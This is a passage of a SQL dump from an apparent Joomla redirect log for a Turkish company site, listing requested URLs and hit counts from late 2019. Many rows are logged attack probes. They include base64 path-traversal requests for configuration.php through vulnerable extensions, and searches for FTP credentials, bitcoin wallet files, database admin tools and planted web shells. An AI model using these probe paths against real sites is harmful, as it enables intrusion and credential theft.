00:00:00',301),(23644,'http://3s-technologies.com.tr:80/tr/configuration.php1',NULL,'http://3s-technologies.com.tr:80/configuration.php1','',1,0,'2019-12-06 02:00:50','0000-00-00 00:00:00',301),(23645,'http://3s-technologies.com.tr:80/tr/configuration.php2',NULL,'http://3s-technologies.com.tr:80/configuration.php2','',1,0,'2019-12-06 02:01:37','0000-00-00 00:00:00',301),(23646,'http://3s-technologies.com.tr:80/tr/configuration.php4',NULL,'http://3s-technologies.com.tr:80/configuration.php4','',2,0,'2019-12-06 02:02:44','0000-00-00 00:00:00',301),(23647,'http://3s-technologies.com.tr:80/tr/configuration.php6',NULL,'http://3s-technologies.com.tr:80/configuration.php6','',1,0,'2019-12-06 02:03:55','0000-00-00 00:00:00',301),(23648,'http://3s-technologies.com.tr:80/tr/configuration.php7',NULL,'http://3s-technologies.com.tr:80/configuration.php7','',1,0,'2019-12-06 02:05:00','0000-00-00 00:00:00',301),(23649,'http://3s-technologies.com.tr:80/tr/configuration.phtml',NULL,'http://3s-technologies.com.tr:80/configuration.phtml','',1,0,'2019-12-06 02:05:36','0000-00-00 00:00:00',301),(23650,'http://3s-technologies.com.tr:80/tr/configuration.php-dist',NULL,'http://3s-technologies.com.tr:80/configuration.php-dist','',1,0,'2019-12-06 02:06:16','0000-00-00 00:00:00',301),(23651,'http://3s-technologies.com.tr:80/tr/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'http://3s-technologies.com.tr:80/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php','',1,0,'2019-12-06 02:46:05','0000-00-00 00:00:00',301),(23652,'http://3s-technologies.com.tr:80/tr/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'http://3s-technologies.com.tr:80/index.php?option=com_cckjseblod&task=download&file=configuration.php','',1,0,'2019-12-06 02:52:57','0000-00-00 00:00:00',301),(23653,'http://3s-technologies.com.tr:80/tr/components/com_portfolio/includes/phpthumb/phpthumb.php?w=800&src=configuration.php',NULL,'http://3s-technologies.com.tr:80/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=configuration.php','',1,0,'2019-12-06 02:54:21','0000-00-00 00:00:00',301),(23654,'http://3s-technologies.com.tr:80/tr/plugins/system/captcha/playcode.php?lng=configuration.php',NULL,'http://3s-technologies.com.tr:80/plugins/system/captcha/playcode.php?lng=configuration.php','',1,0,'2019-12-06 02:55:58','0000-00-00 00:00:00',301),(23655,'http://3s-technologies.com.tr:80/tr/components/com_docman/dl2.php?archive=0&file=li4vli4vli4vli4vli4vli4vli4vdgfyz2v0l3d3dy9jb25mawd1cmf0aw9ulnboca==',NULL,'http://3s-technologies.com.tr:80/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==','',1,0,'2019-12-06 03:00:57','0000-00-00 00:00:00',301),(23656,'http://3s-technologies.com.tr:80/tr/modules/mod_dvfoldercontent/download.php?f=li4vli4vli4vli4vli4vli4vli4vdgfyz2v0l3d3dy9jb25mawd1cmf0aw9ulnboca==',NULL,'http://3s-technologies.com.tr:80/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==','',1,0,'2019-12-06 03:01:18','0000-00-00 00:00:00',301),(23657,'http://3s-technologies.com.tr/tr//components/a.php',NULL,'','',1,0,'2019-12-06 07:16:21','0000-00-00 00:00:00',301),(23658,'https://3s-technologies.com.tr/tr/sftp-config.json',NULL,'','',2,0,'2019-12-06 09:45:20','0000-00-00 00:00:00',301),(23659,'https://3s-technologies.com.tr/tr/.ftpconfig',NULL,'','',1,0,'2019-12-06 09:45:21','0000-00-00 00:00:00',301),(23660,'https://3s-technologies.com.tr/tr/.remote-sync.json',NULL,'','',1,0,'2019-12-06 09:45:21','0000-00-00 00:00:00',301),(23661,'https://3s-technologies.com.tr/tr/.vscode/ftp-sync.json',NULL,'','',4,0,'2019-12-06 09:45:22','0000-00-00 00:00:00',301),(23662,'https://3s-technologies.com.tr/tr/.vscode/sftp.json',NULL,'','',4,0,'2019-12-06 09:45:22','0000-00-00 00:00:00',301),(23663,'https://3s-technologies.com.tr/tr/deployment-config.json',NULL,'','',1,0,'2019-12-06 09:45:23','0000-00-00 00:00:00',301),(23664,'https://3s-technologies.com.tr/tr/ftpsync.settings',NULL,'','',2,0,'2019-12-06 09:45:23','0000-00-00 00:00:00',301),(23665,'http://3s-technologies.com.tr/tr/vuln.php',NULL,'','',55,0,'2019-12-06 16:06:20','0000-00-00 00:00:00',301),(23666,'http://3s-technologies.com.tr:80/tr/joomla/media/k2/users/index.html',NULL,'http://3s-technologies.com.tr:80/joomla/media/k2/users/index.html','',1,0,'2019-12-07 03:10:29','0000-00-00 00:00:00',301),(23667,'http://3s-technologies.com.tr/tr//tmp/j.php',NULL,'','',1,0,'2019-12-07 13:59:51','0000-00-00 00:00:00',301),(23668,'http://3s-technologies.com.tr/tr/media/k2/assets/vendors/studio-42/elfinder/elfinder.html',NULL,'http://www.google.com/','',2,0,'2019-12-07 16:35:04','0000-00-00 00:00:00',301),(23669,'http://3s-technologies.com.tr/tr//images/k.php',NULL,'','',1,0,'2019-12-08 21:32:23','0000-00-00 00:00:00',301),(23670,'http://3s-technologies.com.tr/tr//images/j.php',NULL,'','',1,0,'2019-12-08 21:46:55','0000-00-00 00:00:00',301),(23671,'http://www.3s-technologies.com.tr/tr/vmvqworvf.html',NULL,'','',1,0,'2019-12-09 03:52:42','0000-00-00 00:00:00',301),(23672,'http://3s-technologies.com.tr/tr/media/k2/assets/vendors/studio-42/elfinder/elfinder.php.html',NULL,'http://www.google.com/','',2,0,'2019-12-09 16:45:21','0000-00-00 00:00:00',301),(23673,'http://3s-technologies.com.tr/tr/media/k2/assets/vendors/studio-42/elfinder/src/elfinder-src.php.html',NULL,'http://www.google.com/','',2,0,'2019-12-10 02:48:32','0000-00-00 00:00:00',301),(23674,'http://3s-technologies.com.tr/tr/bbazvobtjnszsogn.html',NULL,'','',1,0,'2019-12-10 02:56:03','0000-00-00 00:00:00',301),(23675,'http://3s-technologies.com.tr/en/wallet.dat',NULL,'','',1,0,'2019-12-10 07:32:35','0000-00-00 00:00:00',301),(23676,'http://3s-technologies.com.tr/en/bitcoin.dat',NULL,'','',1,0,'2019-12-10 07:32:37','0000-00-00 00:00:00',301),(23677,'http://3s-technologies.com.tr/en/backup.dat',NULL,'','',1,0,'2019-12-10 07:32:38','0000-00-00 00:00:00',301),(23678,'http://3s-technologies.com.tr/en/.bitcoin/wallet.dat',NULL,'','',1,0,'2019-12-10 07:32:39','0000-00-00 00:00:00',301),(23679,'http://3s-technologies.com.tr/en/.bitcoin/bitcoin.dat',NULL,'','',1,0,'2019-12-10 07:32:40','0000-00-00 00:00:00',301),(23680,'http://3s-technologies.com.tr/en/.bitcoin/backup.dat',NULL,'','',1,0,'2019-12-10 07:32:41','0000-00-00 00:00:00',301),(23681,'http://3s-technologies.com.tr/en/backup/wallet.dat',NULL,'','',1,0,'2019-12-10 07:32:42','0000-00-00 00:00:00',301),(23682,'http://3s-technologies.com.tr/en/backup/bitcoin.dat',NULL,'','',1,0,'2019-12-10 07:32:43','0000-00-00 00:00:00',301),(23683,'http://3s-technologies.com.tr/en/backup/backup.dat',NULL,'','',1,0,'2019-12-10 07:32:44','0000-00-00 00:00:00',301),(23684,'http://3s-technologies.com.tr/en/index.php/component/users?view=registration',NULL,'','',1,0,'2019-12-10 16:51:11','0000-00-00 00:00:00',301),(23685,'https://3s-technologies.com.tr/tr/shop/admin',NULL,'','',1,0,'2019-12-10 21:10:17','0000-00-00 00:00:00',301),(23686,'https://3s-technologies.com.tr/tr/store/admin',NULL,'','',1,0,'2019-12-10 21:10:17','0000-00-00 00:00:00',301),(23687,'https://3s-technologies.com.tr/tr/magento/admin',NULL,'','',1,0,'2019-12-10 21:10:18','0000-00-00 00:00:00',301),(23688,'https://3s-technologies.com.tr/tr/magento2/admin',NULL,'','',1,0,'2019-12-10 21:10:19','0000-00-00 00:00:00',301),(23689,'https://3s-technologies.com.tr/tr/pub/errors/503.php',NULL,'','',1,0,'2019-12-10 21:10:19','0000-00-00 00:00:00',301),(23690,'https://3s-technologies.com.tr/tr/shop/pub/errors/503.php',NULL,'','',1,0,'2019-12-10 21:10:20','0000-00-00 00:00:00',301),(23691,'https://3s-technologies.com.tr/tr/store/pub/errors/503.php',NULL,'','',1,0,'2019-12-10 21:10:20','0000-00-00 00:00:00',301),(23692,'https://3s-technologies.com.tr/tr/magento/pub/errors/503.php',NULL,'','',1,0,'2019-12-10 21:10:21','0000-00-00 00:00:00',301),(23693,'https://3s-technologies.com.tr/tr/magento2/pub/errors/503.php',NULL,'','',1,0,'2019-12-10 21:10:21','0000-00-00 00:00:00',301),(23694,'https://3s-technologies.com.tr/tr/shop',NULL,'','',8,0,'2019-12-10 21:10:23','0000-00-00 00:00:00',301),(23695,'https://3s-technologies.com.tr/tr/store',NULL,'','',1,0,'2019-12-10 21:10:23','0000-00-00 00:00:00',301),(23696,'https://3s-technologies.com.tr/tr/magento',NULL,'','',1,0,'2019-12-10 21:10:24','0000-00-00 00:00:00',301),(23697,'https://3s-technologies.com.tr/tr/magento2',NULL,'','',1,0,'2019-12-10 21:10:25','0000-00-00 00:00:00',301),(23698,'http://3s-technologies.com.tr/tr/gaestebuch',NULL,'','',13,0,'2019-12-11 17:24:10','0000-00-00 00:00:00',301),(23699,'http://3s-technologies.com.tr/tr/?option=com_easygb',NULL,'','',4,0,'2019-12-11 17:24:10','0000-00-00 00:00:00',301),(23700,'http://3s-technologies.com.tr/tr/?option=com_jambook',NULL,'','',4,0,'2019-12-11 17:24:11','0000-00-00 00:00:00',301),(23701,'http://3s-technologies.com.tr/tr/component/jambook',NULL,'','',9,0,'2019-12-11 17:24:12','0000-00-00 00:00:00',301),(23702,'http://3s-technologies.com.tr/tr/guestbook',NULL,'','',13,0,'2019-12-11 17:24:12','0000-00-00 00:00:00',301),(23703,'http://3s-technologies.com.tr/tr/?option=com_phocaguestbook',NULL,'','',4,0,'2019-12-11 17:24:14','0000-00-00 00:00:00',301),(23704,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/license',NULL,'','',6,0,'2019-12-12 09:05:44','0000-00-00 00:00:00',301),(23705,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/build.xml',NULL,'','',9,0,'2019-12-12 09:05:44','0000-00-00 00:00:00',301),(23706,'https://www.3s-technologies.com.tr/en/images/urunler/t_mi300.jpg',NULL,'https://www.3s-technologies.com.tr/en/products-en/dalga-lehim/mi-300-detail','',38,0,'2019-12-12 14:12:06','0000-00-00 00:00:00',301),(23707,'http://3s-technologies.com.tr/tr/plugins/system/jsnframework/assets/3rd-party/jquery-file-upload/uploadfile.css',NULL,'http://www.google.com/','',1,0,'2019-12-13 03:09:40','0000-00-00 00:00:00',301),(23708,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/growers',NULL,'','',5,0,'2019-12-13 07:46:25','0000-00-00 00:00:00',301),(23709,'http://www.3s-technologies.com.tr/tr/hyddchmadbxw.html',NULL,'','',1,0,'2019-12-15 11:23:01','0000-00-00 00:00:00',301),(23710,'http://3s-technologies.com.tr/tr/elmah.axd',NULL,'','',1,0,'2019-12-15 21:05:38','0000-00-00 00:00:00',301),(23711,'http://3s-technologies.com.tr/tr/gshfawsq.html',NULL,'','',1,0,'2019-12-16 16:13:21','0000-00-00 00:00:00',301),(23712,'http://www.3s-technologies.com.tr/tr/&nx=149&ny=44&clkt=36&bg=!5eal5v5ycndlb6mteuocaaaa91iaaabkmqfsck7v1vdgukhqb-yp4if7mgu8gykhefqpa8rj6tyiwbm1cnods_ddrvwlvs6xuxfycesn_wh4hssqt9oysebco_uyt4nlmunq6nhtcyycr0caj4vg17kyuoujzzwdnrqeruay2c4kehzqzredqfykpxbzj_60yhgzwrf5yyw99kjlhzynhrwcdgkccpzbmyh_uxlt4wv58sm-s7ag25ww5riffaoqfflwj2imthex1ucytn61xsatgf9roh2nqpojz1q-iywnhlwskacci4jmfrd_kjzraow53tbvdmcymwt8udvscnad00zl0rmmxw-jgafenip3nne1fazwnroupb7hucbskmrz0mxttkvojggd5f3ggz3u1xshrsbas87wk8lykk9rmpy3ym7e6c-4tesfood1np6um7rcx8z8orzd6iuxqdiefctnr24hgash-kfd5onrilidfxp57a6zxz2mvkrpp0o6nmwu5a',NULL,'https://www.google.com.tr/','',2,0,'2019-12-18 07:25:58','0000-00-00 00:00:00',301),(23713,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/gf-12-hc-ht-detail',NULL,'','',1,0,'2019-12-18 11:32:09','0000-00-00 00:00:00',301),(23714,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',1,0,'2019-12-18 15:29:59','0000-00-00 00:00:00',301),(23715,'https://3s-technologies.com.tr/tr/login.aspx',NULL,'','',1,0,'2019-12-20 15:34:27','0000-00-00 00:00:00',301),(23716,'http://3s-technologies.com.tr/tr/login.aspx',NULL,'','',4,0,'2019-12-20 15:34:28','0000-00-00 00:00:00',301),(23717,'http://www.3s-technologies.com.tr/tr/frnlznhdkkbum.html',NULL,'','',1,0,'2019-12-22 07:05:34','0000-00-00 00:00:00',301),(23718,'http://3s-technologies.com.tr/tr/nirhpmmbzyp.html',NULL,'','',1,0,'2019-12-23 05:44:40','0000-00-00 00:00:00',301),(23719,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/65-ormiston-pound',NULL,'','',1,0,'2019-12-24 12:40:00','0000-00-00 00:00:00',301),(23720,'http://3s-technologies.com.tr/en/contacts/+()',NULL,'http://3s-technologies.com.tr/en/contacts/+%28%29','',1,0,'2019-12-24 23:47:30','0000-00-00 00:00:00',301),(23721,'http://3s-technologies.com.tr/tr/old/wp-admin',NULL,'https://www.google.com/','',59,0,'2019-12-25 17:28:49','0000-00-00 00:00:00',301),(23722,'http://3s-technologies.com.tr/tr/test/wp-admin',NULL,'https://www.google.com/','',2,0,'2019-12-25 18:23:45','0000-00-00 00:00:00',301),(23723,'http://3s-technologies.com.tr/tr/website/wp-login.php',NULL,'http://3s-technologies.com.tr/website/wp-login.php','',1,0,'2019-12-26 02:54:40','0000-00-00 00:00:00',301),(23724,'http://3s-technologies.com.tr/tr/plupload/upload.php',NULL,'http://www.google.com/','',2,0,'2019-12-27 16:49:39','0000-00-00 00:00:00',301),(23725,'http://3s-technologies.com.tr/tr/?option=com_collector&view=filelist&tmpl=component&folder=&type=1',NULL,'http://www.google.com/','',2,0,'2019-12-27 19:34:43','0000-00-00 00:00:00',301),(23726,'http://3s-technologies.com.tr/tr/?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'http://www.google.com/','',2,0,'2019-12-28 06:40:59','0000-00-00 00:00:00',301),(23727,'http://3s-technologies.com.tr/en/?option=com_users&view=registration',NULL,'http://3s-technologies.com.tr/index.php?option=com_users%26view=registration','',2,0,'2019-12-28 18:27:16','0000-00-00 00:00:00',301),(23728,'http://3s-technologies.com.tr/tr/ad.php',NULL,'http://3s-technologies.com.tr/ad.php','',17,0,'2019-12-29 00:52:14','0000-00-00 00:00:00',301),(23729,'http://3s-technologies.com.tr/tr/adm.php',NULL,'http://3s-technologies.com.tr/adm.php','',3,0,'2019-12-29 00:52:15','0000-00-00 00:00:00',301),(23730,'http://3s-technologies.com.tr/tr/connect.php',NULL,'http://3s-technologies.com.tr/connect.php','',1,0,'2019-12-29 00:52:16','0000-00-00 00:00:00',301),(23731,'http://3s-technologies.com.tr/tr/_adminer.php',NULL,'http://3s-technologies.com.tr/_adminer.php','',4,0,'2019-12-29 00:52:17','0000-00-00 00:00:00',301),(23732,'http://3s-technologies.com.tr/tr/pma.php',NULL,'http://3s-technologies.com.tr/pma.php','',1,0,'2019-12-29 00:52:18','0000-00-00 00:00:00',301),(23733,'http://3s-technologies.com.tr/tr/db.php',NULL,'http://3s-technologies.com.tr/db.php','',147,0,'2019-12-29 00:52:18','0000-00-00 00:00:00',301),(23734,'http://3s-technologies.com.tr/tr/_adminer',NULL,'http://3s-technologies.com.tr/_adminer','',1,0,'2019-12-29 00:52:20','0000-00-00 00:00:00',301),(23735,'http://3s-technologies.com.tr/tr/adminer',NULL,'http://3s-technologies.com.tr/adminer','',1,0,'2019-12-29 00:52:23','0000-00-00 00:00:00',301),(23736,'http://3s-technologies.com.tr/tr/mysql.php',NULL,'http://3s-technologies.com.tr/mysql.php','',2,0,'2019-12-29 00:52:23','0000-00-00 00:00:00',301),(23737,'http://3s-technologies.com.tr/tr/adminer-4.2.5.php',NULL,'http://3s-technologies.com.tr/adminer-4.2.5.php','',1,0,'2019-12-29 00:52:24','0000-00-00 00:00:00',301),(23738,'http://3s-technologies.com.tr/tr/adminer-4.6.2.php',NULL,'http://3s-technologies.com.tr/adminer-4.6.2.php','',1,0,'2019-12-29 00:52:25','0000-00-00 00:00:00',301),(23739,'http://3s-technologies.com.tr/tr/adminer-4.3.1.php',NULL,'http://3s-technologies.com.tr/adminer-4.3.1.php','',1,0,'2019-12-29 00:52:26','0000-00-00 00:00:00',301),(23740,'http://3s-technologies.com.tr/tr/adminer-4.2.4.php',NULL,'http://3s-technologies.com.tr/adminer-4.2.4.php','',1,0,'2019-12-29 00:52:27','0000-00-00 00:00:00',301),(23741,'http://3s-technologies.com.tr/tr/adminer-4.1.0.php',NULL,'http://3s-technologies.com.tr/adminer-4.1.0.php','',1,0,'2019-12-29 00:52:28','0000-00-00 00:00:00',301),(23742,'http://3s-technologies.com.tr/tr/adminer-4.2.5-mysql.php',NULL,'http://3s-technologies.com.tr/adminer-4.2.5-mysql.php','',2,0,'2019-12-29 00:52:29','0000-00-00 00:00:00',301),(23743,'http://3s-technologies.com.tr/tr/adminer-4.6.2-mysql.php',NULL,'http://3s-technologies.com.tr/adminer-4.6.2-mysql.php','',2,0,'2019-12-29 00:52:30','0000-00-00 00:00:00',301),(23744,'http://3s-technologies.com.tr/tr/adminer-4.3.1-mysql.php',NULL,'http://3s-technologies.com.tr/adminer-4.3.1-mysql.php','',2,0,'2019-12-29 00:52:31','0000-00-00 00:00:00',301),(23745,'http://3s-technologies.com.tr/tr/adminer-4.2.4-mysql.php',NULL,'http://3s-technologies.com.tr/adminer-4.2.4-mysql.php','',2,0,'2019-12-29 00:52:32','0000-00-00 00:00:00',301),(23746,'http://3s-technologies.com.tr/tr/adminer-4.1.0-mysql.php',NULL,'http://3s-technologies.com.tr/adminer-4.1.0-mysql.php','',1,0,'2019-12-29 00:52:33','0000-00-00 00:00:00',301),(23747,'http://3s-technologies.com.tr/tr/unzipper.php',NULL,'http://3s-technologies.com.tr/unzipper.php','',7,0,'2019-12-29 00:52:34','0000-00-00 00:00:00',301),(23748,'http://3s-technologies.com.tr/tr/unzip.php',NULL,'http://3s-technologies.com.tr/unzip.php','',10,0,'2019-12-29 00:52:35','0000-00-00 00:00:00',301),(23749,'http://3s-technologies.com.tr/tr/replace.php',NULL,'http://3s-technologies.com.tr/replace.php','',1,0,'2019-12-29 00:52:37','0000-00-00 00:00:00',301),(23750,'http://3s-technologies.com.tr/cache/search.php',NULL,'','',4,0,'2019-12-30 02:55:37','0000-00-00 00:00:00',301),(23751,'http://3s-technologies.com.tr/tr/cache/blackhat.php',NULL,'','',12,0,'2019-12-30 02:56:34','0000-00-00 00:00:00',301),(23752,'http://3s-technologies.com.tr/accesson1.php',NULL,'','',9,0,'2019-12-30 02:56:37','0000-00-00 00:00:00',301),(23753,'http://3s-technologies.com.tr/cache/accesson1.php',NULL,'','',8,0,'2019-12-30 02:56:44','0000-00-00 00:00:00',301),(23754,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/josmtpapi.php?test=hello',NULL,'http://www.google.com/','',22,0,'2019-12-30 04:36:26','0000-00-00 00:00:00',301),(23755,'http://www.3s-technologies.com.tr/tr/efbycvoysnzk.html',NULL,'','',1,0,'2019-12-30 05:59:20','0000-00-00 00:00:00',301),(23756,'http://3s-technologies.com.tr/tr/gyczzsuwzw.html',NULL,'','',1,0,'2019-12-31 06:25:08','0000-00-00 00:00:00',301),(23757,'http://www.3s-technologies.com.tr/tr/&nx=182&ny=29&clkt=22&bg=!7-yl7pryu135im6pdewcaaaa-1iaaabamqfyke_v9eh9uyq-_frsi5_lilokqnoq2mp85ylydlkmvlbegojyom7_esgisxyi9dslcexfjxl2peocy8xtp3fvfiebyaph9ztbeknw78kb6cd5wko_uxwy7ecgvrkqfbvzwvjxfaozg6pxe_7nsgry7cqaqyzm_w5fivaawsjdulb3zpjktv7kpgzqnbi1rxiiky1filpv4cap9s-pamnnf9klb1tplx-jhkrsnuanv2rkdckwkch_fxen9r6p0hropldfxsbofgniucktjiece3i6s6pt_108fhakl9ct96q1njrn6sdwqdnbtttkp6m72i5dyw3hdzb1lllvqa3vqnr5qtx7ty3ymrezrv7-tjivuyvgdwrcqssodzlcjx2dozc5qw6ruj0ikbn4uwz6utbfymcfoxc7tlgs7fih8gzcopriizwxqruc0pp5bz9dwpq8uyw3dhswzjfdpdasuna1k7izy_ttaok8mwboweesba',NULL,'https://www.google.com/','',1,0,'2019-12-31 09:12:00','0000-00-00 00:00:00',301),(23758,'http://3s-technologies.com.tr/tr/wp-content/plugins/delucks-seo/modules/professional/breadcrumbs/assets/css/frontend.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/delucks-seo/modules/professional/breadcrumbs/assets/css/frontend.css','',1,0,'2019-12-31 16:41:25','0000-00-00 00:00:00',301),(23759,'http://3s-technologies.com.tr/tr/wp-content/plugins/easy2map/scripts/jquery.xml2json.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/easy2map/scripts/jquery.xml2json.js','',1,0,'2019-12-31 16:42:03','0000-00-00 00:00:00',301),(23760,'http://3s-technologies.com.tr/tr/wp-content/plugins/easy-wp-smtp/js/script.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/easy-wp-smtp/js/script.js','',1,0,'2019-12-31 16:42:28','0000-00-00 00:00:00',301),(23761,'http://3s-technologies.com.tr/tr/wp-content/plugins/fb-messenger-live-chat/assets/js/main.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fb-messenger-live-chat/assets/js/main.js','',1,0,'2019-12-31 16:43:10','0000-00-00 00:00:00',301),(23762,'http://3s-technologies.com.tr/tr/wp-content/plugins/fv-wordpress-flowplayer/css/flowplayer.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fv-wordpress-flowplayer/css/flowplayer.css','',1,0,'2019-12-31 16:43:43','0000-00-00 00:00:00',301),(23763,'http://3s-technologies.com.tr/tr/wp-content/plugins/hybrid-composer/style.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/hybrid-composer/style.css','',1,0,'2019-12-31 16:44:42','0000-00-00 00:00:00',301),(23764,'http://3s-technologies.com.tr/tr/wp-content/plugins/ithemes-sync/js/settings-page.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/ithemes-sync/js/settings-page.js','',1,0,'2019-12-31 16:44:45','0000-00-00 00:00:00',301),(23765,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-live-chat-software-for-wordpress/plugin_files/js/livechat.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-live-chat-software-for-wordpress/plugin_files/js/livechat.js','',1,0,'2019-12-31 16:44:54','0000-00-00 00:00:00',301),(23766,'http://3s-technologies.com.tr/tr/wp-content/plugins/responsive-coming-soon/templates/template1/assets/css/style.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/responsive-coming-soon/templates/template1/assets/css/style.css','',1,0,'2019-12-31 16:45:44','0000-00-00 00:00:00',301),(23767,'http://3s-technologies.com.tr/tr/wp-content/plugins/rich-reviews/css/rich-reviews.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/rich-reviews/css/rich-reviews.css','',1,0,'2019-12-31 16:46:12','0000-00-00 00:00:00',301),(23768,'http://3s-technologies.com.tr/tr/wp-content/plugins/simple-fields/js/chosen/chosen.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/simple-fields/js/chosen/chosen.css','',1,0,'2019-12-31 16:46:50','0000-00-00 00:00:00',301),(23769,'http://3s-technologies.com.tr/tr/wp-content/plugins/smart-google-code-inserter/screenshot1.jpg',NULL,'http://3s-technologies.com.tr/wp-content/plugins/smart-google-code-inserter/screenshot1.jpg','',1,0,'2019-12-31 16:47:19','0000-00-00 00:00:00',301),(23770,'http://3s-technologies.com.tr/tr/wp-content/plugins/visualizer/js/media.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/visualizer/js/media.js','',1,0,'2019-12-31 16:48:18','0000-00-00 00:00:00',301),(23771,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-inventory-manager/themes/css/default-theme.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-inventory-manager/themes/css/default-theme.css','',1,0,'2019-12-31 16:48:49','0000-00-00 00:00:00',301),(23772,'http://3s-technologies.com.tr/tr/wp-content/plugins/insert-php/admin/assets/js/tag-it.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/insert-php/admin/assets/js/tag-it.js','',1,0,'2019-12-31 16:49:08','0000-00-00 00:00:00',301),(23773,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpematico/app/js/wpe_hooks.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wpematico/app/js/wpe_hooks.js','',1,0,'2019-12-31 16:50:07','0000-00-00 00:00:00',301),(23774,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-private-content-plus/css/wppcp-front.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-private-content-plus/css/wppcp-front.css','',1,0,'2019-12-31 16:50:43','0000-00-00 00:00:00',301),(23775,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpshopify/dist/public.min.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wpshopify/dist/public.min.css','',1,0,'2019-12-31 16:51:00','0000-00-00 00:00:00',301),(23776,'http://3s-technologies.com.tr/tr/wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js','',1,0,'2019-12-31 16:51:28','0000-00-00 00:00:00',301),(23777,'http://3s-technologies.com.tr/tr/wp-content/plugins/yuzo-related-post/assets/js/admin.js',NULL,'http://3s-technologies.com.tr/wp-content/plugins/yuzo-related-post/assets/js/admin.js','',1,0,'2019-12-31 16:52:02','0000-00-00 00:00:00',301),(23778,'http://3s-technologies.com.tr/tr/wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors',NULL,'http://3s-technologies.com.tr/wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors','',1,0,'2019-12-31 16:52:45','0000-00-00 00:00:00',301),(23779,'http://3s-technologies.com.tr/wp-admin/admin-post.php',NULL,'','',4,0,'2019-12-31 16:55:21','0000-00-00 00:00:00',301),(23780,'http://3s-technologies.com.tr/wp-json/wpshopify/v1/settings',NULL,'','',2,0,'2019-12-31 16:59:45','0000-00-00 00:00:00',301),(23781,'http://3s-technologies.com.tr/tr/raiz0.html',NULL,'','',4,0,'2020-01-01 16:19:33','0000-00-00 00:00:00',301),(23782,'http://3s-technologies.com.tr/tr/minus.php',NULL,'','',4,0,'2020-01-01 16:19:41','0000-00-00 00:00:00',301),(23783,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/mudxizxnc.php',NULL,'','',4,0,'2020-01-01 16:19:50','0000-00-00 00:00:00',301),(23784,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/mudxizxnc.php',NULL,'','',4,0,'2020-01-01 16:19:58','0000-00-00 00:00:00',301),(23785,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/mudxizxnc.php',NULL,'','',3,0,'2020-01-01 16:20:05','0000-00-00 00:00:00',301),(23786,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-categories/73-park-site/photo-gallery/scenery/34-pinnacles',NULL,'','',1,0,'2020-01-02 23:04:24','0000-00-00 00:00:00',301),(23787,'http://3s-technologies.com.tr/tr/administrator/components/com_j2store/com_j2store.xml',NULL,'','',1,0,'2020-01-03 12:45:07','0000-00-00 00:00:00',301),(23788,'http://3s-technologies.com.tr/tr/administrator/components/com_j2store/_j2store.xml',NULL,'','',1,0,'2020-01-03 12:45:07','0000-00-00 00:00:00',301),(23789,'http://3s-technologies.com.tr/tr/administrator/components/com_j2store/access.xml',NULL,'','',1,0,'2020-01-03 12:45:08','0000-00-00 00:00:00',301),(23790,'http://3s-technologies.com.tr/tr/administrator/components/com_j2store/j2store.xml',NULL,'','',1,0,'2020-01-03 12:45:08','0000-00-00 00:00:00',301),(23791,'http://3s-technologies.com.tr/tr/administrator/components/com_j2store/config.xml',NULL,'','',1,0,'2020-01-03 12:45:09','0000-00-00 00:00:00',301),(23792,'http://3s-technologies.com.tr/tr/administrator/components/com_formmaker/com_formmaker.xml',NULL,'','',1,0,'2020-01-03 12:45:09','0000-00-00 00:00:00',301),(23793,'http://3s-technologies.com.tr/tr/administrator/components/com_formmaker/_formmaker.xml',NULL,'','',1,0,'2020-01-03 12:45:10','0000-00-00 00:00:00',301),(23794,'http://3s-technologies.com.tr/tr/administrator/components/com_formmaker/access.xml',NULL,'','',1,0,'2020-01-03 12:45:11','0000-00-00 